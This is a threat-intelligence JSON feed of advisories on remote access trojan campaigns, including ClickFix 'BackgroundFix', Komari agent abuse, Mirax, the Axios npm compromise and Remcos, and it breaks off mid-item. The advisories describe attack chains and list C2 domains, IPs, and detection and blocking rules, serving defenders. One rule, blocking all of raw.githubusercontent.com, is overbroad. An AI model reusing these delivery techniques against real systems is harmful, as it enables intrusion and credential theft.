{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/rat/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Windows","Microsoft 365","Google Workspace"],"_cs_severities":["high"],"_cs_tags":["clickfix","malware","social-engineering","rat","infostealer","castleloader","netsupport"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThe BackgroundFix campaign is a social engineering scheme using fake \u0026ldquo;remove your photo background\u0026rdquo; services to deliver malware. Victims are lured to malicious sites mimicking legitimate image editing tools. The sites feature fake upload interfaces, progress bars, and download buttons to appear authentic. This campaign delivers a multi-stage payload, starting with CastleLoader. CastleLoader then drops NetSupport RAT, enabling remote access for the attackers, and CastleStealer, a custom .NET stealer designed to exfiltrate browser credentials, wallet extension data, and Telegram session files. This campaign appears to be active, with multiple domains sharing the same template.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eVictim searches for an online background removal tool and lands on a malicious BackgroundFix site.\u003c/li\u003e\n\u003cli\u003eThe victim uploads an image to the fake website.\u003c/li\u003e\n\u003cli\u003eAfter clicking a checkbox, the site instructs the victim to copy a command to their clipboard.\u003c/li\u003e\n\u003cli\u003eThe copied command executes \u003ccode\u003efinger.exe\u003c/code\u003e to query \u003ccode\u003echeeshomireciple[.]com\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003efinger.exe\u003c/code\u003e retrieves a batch script from the C2 server.\u003c/li\u003e\n\u003cli\u003eThe batch script executes commands to download and execute further payloads.\u003c/li\u003e\n\u003cli\u003eCastleLoader is deployed, subsequently dropping NetSupport RAT and CastleStealer.\u003c/li\u003e\n\u003cli\u003eNetSupport RAT grants the attacker remote access, while CastleStealer exfiltrates sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful attacks result in the installation of NetSupport RAT, granting attackers remote control over the compromised system. Additionally, CastleStealer exfiltrates sensitive information such as browser credentials, wallet extension data, and Telegram session files. This stolen data can be used for further malicious activities, including financial fraud, identity theft, and unauthorized access to sensitive accounts. The active nature of the campaign and the use of multiple domains suggest a broad targeting scope.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for the execution of \u003ccode\u003efinger.exe\u003c/code\u003e with command-line arguments pointing to external domains (IOC: \u003ccode\u003echeeshomireciple[.]com\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect the execution of \u003ccode\u003efinger.exe\u003c/code\u003e to identify potential initial access attempts.\u003c/li\u003e\n\u003cli\u003eBlock the C2 domain \u003ccode\u003echeeshomireciple[.]com\u003c/code\u003e at the DNS resolver to prevent initial payload delivery.\u003c/li\u003e\n\u003cli\u003eMonitor network connections for NetSupport RAT C2 communications on port 688 to detect compromised systems (IOCs: \u003ccode\u003eporonto[.]com:688\u003c/code\u003e, \u003ccode\u003egiovettiadv[.]com:688\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T13:00:00Z","date_published":"2026-04-30T13:00:00Z","id":"/briefs/2026-04-clickfix-backgroundfix/","summary":"The 'BackgroundFix' ClickFix campaign uses social engineering to trick victims into downloading malware disguised as a free image-editing tool, leading to the deployment of CastleLoader, NetSupport RAT for remote access, and CastleStealer for credential theft.","title":"ClickFix 'BackgroundFix' Campaign Delivers CastleLoader, NetSupport RAT, and CastleStealer","url":"https://feed.craftedsignal.io/briefs/2026-04-clickfix-backgroundfix/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender","FortiGate","komari-agent"],"_cs_severities":["high"],"_cs_tags":["komari","backdoor","nssm","github","rat","reverse shell"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Fortinet","GitHub"],"content_html":"\u003cp\u003eHuntress discovered threat actors leveraging the Komari monitoring agent as a SYSTEM-level backdoor within a partner environment. Komari, a Go-based project on GitHub with over 4,000 stars, is designed as a remote-control and monitoring tool. This incident marks a publicly documented case of Komari being abused in a real-world intrusion. The attackers compromised VPN credentials to gain initial access before deploying the Komari agent as a persistent backdoor. Komari inherently functions as a command-and-control (C2) channel, with features enabled by default. The threat actor installed Komari as a Windows service named \u0026ldquo;Windows Update Service\u0026rdquo; using NSSM, directly from the official GitHub repository, which avoided the need for attacker-controlled staging infrastructure. The initial discovery occurred on April 16, 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e The attacker establishes an SSLVPN session on a FortiGate device from IP address 45.153.34[.]132, authenticating as a legitimate user, [User 1].\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eInternal Reconnaissance:\u003c/strong\u003e After establishing the VPN connection, the attacker\u0026rsquo;s workstation, identified as VM8514, begins enumerating the internal network from the tunnel IP 10.212.134[.]200.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement:\u003c/strong\u003e Using Impacket\u0026rsquo;s smbexec.py, the attacker enables Remote Desktop Protocol (RDP) on the target workstation, [REDACTED-WRKSTN].\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRDP Access:\u003c/strong\u003e The attacker establishes an interactive RDP session to [REDACTED-WRKSTN].\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePersistence - Service Creation:\u003c/strong\u003e The attacker uses the Non-Sucking Service Manager (NSSM) to install the Komari agent as a persistent Windows service named \u0026ldquo;Windows Update Service\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAgent Download:\u003c/strong\u003e The Komari agent is downloaded from raw.githubusercontent[.]com/komari-monitor/komari-agent using a PowerShell one-liner executed directly on the system.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCommand and Control:\u003c/strong\u003e The Komari agent establishes a persistent WebSocket connection to its server, allowing the attacker to execute arbitrary commands (PowerShell/sh) and initiate interactive PTY reverse shell sessions.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMaintain Access \u0026amp; Execute:\u003c/strong\u003e The attacker maintains SYSTEM-level access via the persistent Komari agent, enabling ongoing remote command execution and control over the compromised workstation.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis attack demonstrates how readily available monitoring tools can be weaponized for malicious purposes. A single compromised account led to the establishment of a SYSTEM-level backdoor on a critical workstation. This could result in data exfiltration, further lateral movement within the network, and potentially ransomware deployment. Microsoft Defender quarantined an earlier registry hive dumping attempt, preventing further data compromise. The number of affected organizations is currently unknown, but any organization using the Komari agent without proper security controls is potentially at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor FortiGate logs for SSLVPN sessions originating from suspicious IP addresses (45.153.34[.]132) and unusual ASN\u0026rsquo;s (ASN 51396) to detect potentially compromised credentials.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u0026ldquo;Detect Komari Agent Installation via PowerShell\u0026rdquo; to identify installations of the Komari agent.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for the execution of \u003ccode\u003enssm.exe\u003c/code\u003e installing a service named \u0026ldquo;Windows Update Service\u0026rdquo; to detect suspicious service installations.\u003c/li\u003e\n\u003cli\u003eBlock the domain raw.githubusercontent[.]com at the DNS resolver or web proxy to prevent the downloading of malicious tools and payloads.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T00:00:00Z","date_published":"2026-04-30T00:00:00Z","id":"/briefs/2026-04-komari-red/","summary":"Threat actors are abusing the Komari monitoring agent, a project hosted on GitHub, as a SYSTEM-level backdoor following initial access through compromised VPN credentials and lateral movement via Impacket.","title":"Komari Agent Abused as SYSTEM-Level Backdoor","url":"https://feed.craftedsignal.io/briefs/2026-04-komari-red/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["android","rat","mirax","malware-as-a-service","proxy"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe Mirax RAT is a newly identified Android Remote Access Trojan (RAT) that has been actively targeting users in Europe since March 2026. It\u0026rsquo;s offered as Malware-as-a-Service (MaaS) to a small group of affiliates, primarily Russian-speaking actors, through tiered subscription models. Since December 2025, Mirax has been promoted on underground forums and used in multiple campaigns. The RAT\u0026rsquo;s distribution relies on malicious advertisements on Meta platforms like Facebook, Instagram, and Messenger, with over 200,000 users potentially exposed to these ads. The malware uses dropper pages hosted on GitHub and relies on APK sideloading for execution, bypassing the Google Play Store\u0026rsquo;s security measures. Mirax\u0026rsquo;s capabilities extend beyond typical RAT functions, including turning infected devices into residential proxy nodes via a SOCKS5 proxy.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker creates malicious ads on Facebook, Instagram, and Messenger promoting IPTV application services.\u003c/li\u003e\n\u003cli\u003eUsers click on the advertisements, which redirect them to dropper pages hosted on GitHub.\u003c/li\u003e\n\u003cli\u003eThe user is prompted to enable installation from unknown sources on their Android device.\u003c/li\u003e\n\u003cli\u003eThe malicious IPTV application is installed via APK sideloading.\u003c/li\u003e\n\u003cli\u003eThe application initiates a multi-stage infection process, utilizing Golden Encryption (Golden Crypt) to pack the payload.\u003c/li\u003e\n\u003cli\u003eThe payload, an encrypted Dalvik Executable (.dex) file, is decrypted during installation using the RC4 stream cipher with a hardcoded key.\u003c/li\u003e\n\u003cli\u003eMirax gains control of the device, enabling overlay and notification injection for credential theft.\u003c/li\u003e\n\u003cli\u003eAttackers can view the screen in real-time, navigate and control the device, manage applications, exfiltrate images and text, and launch a SOCKS5 proxy connection to proxy traffic through the infected device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe Mirax RAT campaign has the potential to affect a large number of Android users in Europe. The malicious advertisements have already reached over 200,000 users. Successful infections can lead to credential theft, financial fraud, data exfiltration, and the compromised device being used as a residential proxy, potentially masking malicious activity and further expanding the attacker\u0026rsquo;s reach. Banks and financial institutions are specifically highlighted as high-value targets.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor network traffic for connections to GitHub domains associated with APK downloads, and correlate that with android device user agents (Network Connection and User Agent logs).\u003c/li\u003e\n\u003cli\u003eImplement detections for process creation events related to sideloaded APK installations, specifically looking for unusual parent-child process relationships (Process Creation Logs).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule provided below to detect the execution of applications from untrusted sources and tune for your environment.\u003c/li\u003e\n\u003cli\u003eMonitor network connections for SOCKS5 proxy traffic originating from Android devices, which may indicate compromised devices acting as residential proxies (Network Connection Logs).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-16T12:00:00Z","date_published":"2026-04-16T12:00:00Z","id":"/briefs/2026-04-mirax-rat/","summary":"Mirax RAT, a new Android RAT distributed as MaaS, is targeting European users by turning infected devices into residential proxy nodes and enabling credential theft via overlay and notification injection.","title":"Mirax RAT Targeting Android Users in Europe","url":"https://feed.craftedsignal.io/briefs/2026-04-mirax-rat/"},{"_cs_actors":["UNC1069"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply chain attack","npm","social engineering","rat","unc1069"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn April 4, 2026, the maintainers of the Axios HTTP client disclosed a social engineering attack targeting one of their developers. The attack, attributed to the North Korean threat actor UNC1069, involved impersonating a legitimate company to build trust with the targeted developer. The attacker used a fake Microsoft Teams update disguised as a critical error fix to deploy a remote access trojan (RAT). This RAT allowed the attackers to gain access to the developer\u0026rsquo;s system and npm credentials. The attackers then published two malicious versions of Axios (1.14.1 and 0.30.4) to the npm package registry. These malicious versions included a dependency called plain-crypto-js, which installed a RAT on macOS, Windows, and Linux systems. These versions were available for three hours, posing a supply chain risk to any systems that installed them during that period.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a target developer and initiates contact via LinkedIn/Slack, impersonating a legitimate company.\u003c/li\u003e\n\u003cli\u003eThe attacker invites the developer to a Slack workspace populated with fake profiles and staged company activity.\u003c/li\u003e\n\u003cli\u003eA meeting is scheduled on Microsoft Teams, during which a fake \u0026ldquo;RTC Connection\u0026rdquo; error message is displayed.\u003c/li\u003e\n\u003cli\u003eThe attacker prompts the developer to install a \u0026ldquo;Teams update\u0026rdquo; to resolve the error.\u003c/li\u003e\n\u003cli\u003eThe fake update is a RAT malware, granting the attacker remote access to the developer\u0026rsquo;s machine.\u003c/li\u003e\n\u003cli\u003eThe attacker steals the developer\u0026rsquo;s npm credentials, bypassing MFA due to already authenticated session.\u003c/li\u003e\n\u003cli\u003eThe attacker publishes malicious versions of the Axios package (1.14.1 and 0.30.4) to the npm registry, injecting the plain-crypto-js dependency.\u003c/li\u003e\n\u003cli\u003eSystems installing the compromised Axios versions download and execute the plain-crypto-js package, resulting in RAT deployment and credential theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the Axios npm package created a supply chain attack impacting an unknown number of systems across various sectors. Systems that installed the malicious versions (1.14.1 and 0.30.4) within the three-hour window are considered compromised. Successful exploitation results in the installation of a remote access trojan (RAT) capable of stealing credentials, browser data, and other sensitive information from macOS, Windows, and Linux systems. This can lead to further unauthorized access, data breaches, and potential financial loss.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor npm package installations for the presence of the plain-crypto-js dependency, particularly in projects that use Axios versions 1.14.1 or 0.30.4.\u003c/li\u003e\n\u003cli\u003eImplement multi-factor authentication (MFA) for npm accounts and other developer accounts, but recognize that authenticated sessions can be hijacked.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious NPM Package Installation\u0026rdquo; to detect potentially malicious package installations based on unusual parent processes (see below).\u003c/li\u003e\n\u003cli\u003eBlock the domain associated with the malicious dependency plain-crypto-js at the DNS resolver.\u003c/li\u003e\n\u003cli\u003eEducate developers about social engineering tactics and the risks of installing software from untrusted sources.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-04T20:30:42Z","date_published":"2026-04-04T20:30:42Z","id":"/briefs/2026-04-axios-npm-hack/","summary":"North Korean threat actors (UNC1069) compromised the Axios npm package by socially engineering a maintainer with a fake Microsoft Teams update delivering a RAT, leading to the injection of a malicious dependency and a supply chain attack.","title":"Axios npm Package Compromised via Social Engineering","url":"https://feed.craftedsignal.io/briefs/2026-04-axios-npm-hack/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","npm","javascript","rat"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 31, 2026, the official Axios node package manager (npm) package was compromised in a supply chain attack. The attack resulted in the deployment of two malicious versions, v1.14.1 and v0.30.4. Axios is a widely-used JavaScript library for making HTTP requests, with approximately 100 million downloads per week. The malicious packages were available for around three hours. The compromised packages introduced a fake runtime dependency, \u0026lsquo;plain-crypto-js\u0026rsquo;, that executes automatically after installation. This dependency then communicates with attacker-controlled infrastructure at 142.11.206.73, pulling down platform-specific payloads for Linux, MacOS, and Windows. The payloads are remote access trojans (RATs), enabling the attackers to gather information and execute additional malicious activities.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromised the Axios NPM package and injected malicious code.\u003c/li\u003e\n\u003cli\u003eMalicious versions v1.14.1 and v0.30.4 were published to the NPM registry.\u003c/li\u003e\n\u003cli\u003eThe malicious packages introduce a fake runtime dependency named \u0026lsquo;plain-crypto-js\u0026rsquo;.\u003c/li\u003e\n\u003cli\u003eUpon installation of the compromised package, the \u0026lsquo;plain-crypto-js\u0026rsquo; dependency executes automatically via a post-install script.\u003c/li\u003e\n\u003cli\u003eThe dependency connects to the attacker-controlled IP address 142.11.206.73 to retrieve a platform-specific payload.\u003c/li\u003e\n\u003cli\u003eOn MacOS, a binary named \u0026ldquo;com.apple.act.mond\u0026rdquo; is downloaded and executed using zsh.\u003c/li\u003e\n\u003cli\u003eOn Windows, a PowerShell script (6202033.ps1) is downloaded, and the legitimate powershell.exe is copied to \u0026ldquo;%PROGRAM DATA%\\wt.exe\u0026rdquo;, and the ps1 script is executed with hidden and execution policy bypass flags.\u003c/li\u003e\n\u003cli\u003eOn Linux, a Python backdoor is downloaded and executed. The downloaded executables act as Remote Access Trojans (RATs) exfiltrating credentials and enabling remote management.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack could lead to significant compromise across numerous organizations using the Axios library. The actors exfiltrate credentials and gain remote management capabilities. All credentials present on systems that installed the malicious package should be considered compromised and immediately rotated. The widespread use of Axios means the impact could extend to many applications and systems, potentially enabling further attacks leveraging compromised credentials. Supply chain attacks like these affecting widely used libraries, as seen in 25% of the top 100 vulnerabilities in the Cisco Talos 2025 Year in Review, highlight the substantial risk they pose.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRoll back to safe Axios versions (v1.14.0 or v0.30.3) immediately to prevent further compromise, as mentioned in the overview.\u003c/li\u003e\n\u003cli\u003eInvestigate systems that downloaded malicious packages (v1.14.1 or v0.30.4) for signs of follow-on payloads from the actor-controlled infrastructure, as described in the overview.\u003c/li\u003e\n\u003cli\u003eBlock the actor-controlled IP address 142.11.206.73 and domain Sfrclak.com at the network perimeter to prevent further communication with the malicious infrastructure, per the IOC list.\u003c/li\u003e\n\u003cli\u003eMonitor for execution of PowerShell scripts from unusual locations, specifically \u0026ldquo;%PROGRAM DATA%\\wt.exe\u0026rdquo;, as part of the attack chain.\u003c/li\u003e\n\u003cli\u003eImplement a process creation rule to alert when processes connect to external IPs using uncommon parent processes. See example rule below.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-04T12:00:00Z","date_published":"2026-04-04T12:00:00Z","id":"/briefs/2026-04-axios-npm-supply-chain/","summary":"A supply chain attack on the Axios NPM package injected malicious code into versions v1.14.1 and v0.30.4, leading to the deployment of platform-specific remote access trojans (RATs) after the installation of a rogue dependency that communicated with attacker-controlled infrastructure to retrieve malicious payloads for Windows, MacOS, and Linux.","title":"Axios NPM Supply Chain Attack Delivering Platform-Specific RATs","url":"https://feed.craftedsignal.io/briefs/2026-04-axios-npm-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","npm","rat","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 31, 2026, a supply chain attack targeted the \u003ccode\u003eaxios\u003c/code\u003e npm package, a widely used HTTP client library for JavaScript. Compromised versions 1.14.1 and 0.30.4 of the library were injected with malicious code that installed a cross-platform Remote Access Trojan (RAT) on systems that installed the affected versions of \u003ccode\u003e@usebruno/cli\u003c/code\u003e. This attack specifically impacted users of the \u003ccode\u003e@usebruno/cli\u003c/code\u003e who performed an \u003ccode\u003enpm install\u003c/code\u003e within a roughly 3-hour window, between 00:21 UTC and 03:30 UTC. The malicious code was designed to execute during the \u003ccode\u003epostinstall\u003c/code\u003e phase of the package installation, indicating a targeted effort to compromise developer environments. This incident highlights the increasing risk of supply chain attacks targeting open-source software and the importance of verifying the integrity of third-party dependencies.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker compromises the \u003ccode\u003eaxios\u003c/code\u003e npm package, injecting malicious code into versions 1.14.1 and 0.30.4.\u003c/li\u003e\n\u003cli\u003eThe compromised \u003ccode\u003eaxios\u003c/code\u003e package is published to the npm registry.\u003c/li\u003e\n\u003cli\u003eA user of \u003ccode\u003e@usebruno/cli\u003c/code\u003e executes \u003ccode\u003enpm install\u003c/code\u003e within the attack window (00:21 UTC - 03:30 UTC on March 31, 2026).\u003c/li\u003e\n\u003cli\u003eThe npm package manager resolves the dependency chain and downloads the compromised \u003ccode\u003eaxios\u003c/code\u003e package as a dependency of \u003ccode\u003e@usebruno/cli\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe malicious code within the \u003ccode\u003eaxios\u003c/code\u003e package executes during the \u003ccode\u003epostinstall\u003c/code\u003e script phase of the installation process.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003epostinstall\u003c/code\u003e script downloads and installs a cross-platform Remote Access Trojan (RAT) on the user\u0026rsquo;s system.\u003c/li\u003e\n\u003cli\u003eThe RAT establishes a connection to a remote command-and-control (C2) server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the RAT to exfiltrate credentials and other sensitive data from the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack could have resulted in widespread compromise of developer systems that used the \u003ccode\u003e@usebruno/cli\u003c/code\u003e. While the number of affected users is unknown, the incident could have led to the exfiltration of sensitive credentials and proprietary source code, potentially enabling further attacks against the affected organizations and their customers. The incident underscores the need for robust security measures in software development pipelines and continuous monitoring of third-party dependencies for malicious activity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eIf \u003ccode\u003e@usebruno/cli\u003c/code\u003e was installed during the affected window, reinstall dependencies to ensure a clean version of \u003ccode\u003eaxios\u003c/code\u003e is used (reference: Impact section).\u003c/li\u003e\n\u003cli\u003eRotate all credentials and secrets that were present on systems where \u003ccode\u003e@usebruno/cli\u003c/code\u003e was installed during the affected window (reference: Impact section).\u003c/li\u003e\n\u003cli\u003eReview and implement the security guidance provided in the Aikido Security blog post to further harden your systems (reference: \u003ca href=\"https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat)\"\u003ehttps://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat)\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for unusual processes spawned by npm or node processes, using the provided Sigma rule (reference: Sigma rule - \u0026ldquo;Detect Suspicious Process Spawned by NPM\u0026rdquo;).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T12:00:00Z","date_published":"2026-04-03T12:00:00Z","id":"/briefs/2026-04-axios-supply-chain/","summary":"Compromised versions of the `axios` npm package introduced a hidden dependency deploying a cross-platform Remote Access Trojan (RAT), impacting users of `@usebruno/cli` who ran `npm install` between 00:21 UTC and ~03:30 UTC on March 31, 2026, potentially leading to credential exfiltration.","title":"Compromised Axios Library Leads to RAT Deployment via @usebruno/cli","url":"https://feed.craftedsignal.io/briefs/2026-04-axios-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","rat","npm","pylangghost"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA new remote access trojan (RAT) named PylangGhost has been discovered on the npm registry. This marks the first known instance of this specific RAT being distributed via a software supply chain attack on the npm ecosystem. The RAT is named for its use of Python and potentially for obfuscation or evasion techniques. The affected npm packages are designed to inject malicious code into projects that depend on them. This malicious code facilitates unauthorized remote access to infected systems, thereby providing threat actors with the ability to exfiltrate sensitive data, deploy further malware, or perform other malicious activities. This is a supply chain attack that endangers developers and applications.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA developer installs a malicious package from the npm registry containing PylangGhost.\u003c/li\u003e\n\u003cli\u003eDuring the installation process, a post-install script or similar mechanism executes, injecting the PylangGhost RAT into the developer\u0026rsquo;s environment.\u003c/li\u003e\n\u003cli\u003eThe RAT establishes a connection to a command-and-control (C2) server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe C2 server sends commands to the infected system, instructing the RAT to perform specific actions.\u003c/li\u003e\n\u003cli\u003eThe RAT executes the commands, potentially including data exfiltration, downloading and executing additional payloads, or establishing persistence.\u003c/li\u003e\n\u003cli\u003eSensitive data, such as credentials, API keys, or source code, is exfiltrated from the compromised system to the C2 server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote access and control over the compromised system, enabling further malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe presence of PylangGhost on the npm registry introduces a significant supply chain risk.  Successful infection allows attackers to gain remote access to developer systems, potentially leading to the theft of sensitive source code, credentials, and other proprietary information. The compromise can extend to applications built using the infected packages, impacting downstream users and potentially leading to widespread data breaches or service disruptions. The number of affected victims is currently unknown, but the risk is widespread due to the popularity of the npm registry.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor npm package installations for suspicious post-install scripts or unexpected network connections (see related Sigma rules).\u003c/li\u003e\n\u003cli\u003eImplement strong dependency scanning tools to identify and remove potentially malicious packages from your projects.\u003c/li\u003e\n\u003cli\u003eAnalyze network connection logs for connections to unusual or malicious domains after npm package installations (see related Sigma rules).\u003c/li\u003e\n\u003cli\u003eEnable process monitoring for any processes spawned during or after npm package installations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-16T04:45:53Z","date_published":"2026-03-16T04:45:53Z","id":"/briefs/2024-01-pylangghost-npm/","summary":"A new remote access trojan (RAT) named PylangGhost has been observed on the npm registry, posing a supply chain risk to developers and applications using affected packages.","title":"PylangGhost RAT Observed on npm Registry","url":"https://feed.craftedsignal.io/briefs/2024-01-pylangghost-npm/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["remcos","rat","fileless","phishing"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis threat brief discusses a Remcos RAT infection chain that utilizes a fileless, multi-stage approach. While specific details regarding the initial phishing lure, exploitation method, and Remcos RAT version are absent from the original report, the core focus is on the fileless execution and memory residency of the RAT. The attack begins with an unspecified phishing attack and culminates in a Remcos RAT running entirely in memory, hindering traditional disk-based forensic analysis. This type of attack poses a significant challenge to traditional endpoint detection and response (EDR) solutions. The scope and scale of this campaign are unknown, but fileless techniques are generally employed in targeted attacks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unsuspecting user receives a phishing email containing a malicious attachment or link (specific delivery mechanism not specified).\u003c/li\u003e\n\u003cli\u003eThe user interacts with the malicious content, initiating the first stage of the attack.\u003c/li\u003e\n\u003cli\u003eA script (e.g., PowerShell, VBScript) is executed, likely delivered through the phishing attachment/link.\u003c/li\u003e\n\u003cli\u003eThe script downloads and executes additional payloads directly into memory, avoiding writing files to disk.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload injects Remcos RAT into a legitimate system process (process injection).\u003c/li\u003e\n\u003cli\u003eRemcos RAT establishes a command and control (C2) connection with the attacker\u0026rsquo;s server for further instructions.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform various malicious activities such as data exfiltration, keylogging, or lateral movement.\u003c/li\u003e\n\u003cli\u003eThe Remcos RAT persists in memory, potentially evading detection by signature-based antivirus solutions.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe successful deployment of Remcos RAT can lead to significant data breaches, intellectual property theft, and financial losses. Victims may experience system instability, unauthorized access to sensitive information, and reputational damage. The fileless nature of the attack makes it harder to detect and remediate, potentially prolonging the dwell time and increasing the overall impact. The number of victims and targeted sectors are not specified in the original source.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable PowerShell script block logging and transcription to enhance visibility into potentially malicious script execution (reference attack chain step 3).\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for suspicious parent-child relationships (e.g., \u003ccode\u003ecmd.exe\u003c/code\u003e or \u003ccode\u003epowershell.exe\u003c/code\u003e spawning uncommon processes) to detect injected Remcos processes (reference attack chain step 5).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided below to your SIEM and tune them for your specific environment.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unauthorized or unknown scripts and binaries (reference attack chain step 4).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-15T15:34:12Z","date_published":"2026-03-15T15:34:12Z","id":"/briefs/2024-01-remcos-fileless/","summary":"A fileless multi-stage Remcos RAT is delivered via phishing, achieving 